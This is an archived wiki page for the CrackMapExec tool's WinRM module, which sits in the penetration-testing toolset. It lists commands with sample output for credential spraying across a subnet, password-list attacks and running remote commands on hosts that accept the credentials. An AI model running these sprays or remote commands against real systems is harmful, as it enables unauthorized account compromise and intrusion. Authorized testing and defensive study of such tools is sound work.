This repository has been archived by the owner on Dec 6, 2023. It is now read-only.
WINRM Command Reference
mpgn edited this page Apr 30, 2020
·
5 revisions
Updated: 28/04/2020
CME Version:5.0.1dev
#~ cme winrm 192.168.1.0/24 -u user -p password
Expected Results:
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 ROGER [+] GOLD\user:password (Pwn3d!)
If the SMB port is closed you can also use the flag -d DOMAIN to avoid an SMB connection
#~ cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN
Expected Results:
WINRM 192.168.255.131 5985 192.168.255.131 [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 192.168.255.131 [+] GOLD\user:password (Pwn3d!)
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
Expected Results:
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 ROGER [-] GOLD\test1:pass1 "Failed to authenticate the user test1 with ntlm"
WINRM 192.168.255.131 5985 ROGER [+] GOLD\bonclay:Password@123 (Pwn3d!)
Note: By default CME will exit after a successful login is found. Using the --continue-on-success flag will continue spraying even after a valid password is found. Usefull for spraying a single password against a large user list.
#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
WINRM 192.168.255.131 5985 ROGER [*] http://192.168.255.131:5985/wsman
WINRM 192.168.255.131 5985 ROGER [+] GOLD\user:password (Pwn3d!)
WINRM 192.168.255.131 5985 ROGER [+] Executed command
WINRM 192.168.255.131 5985 ROGER gold\user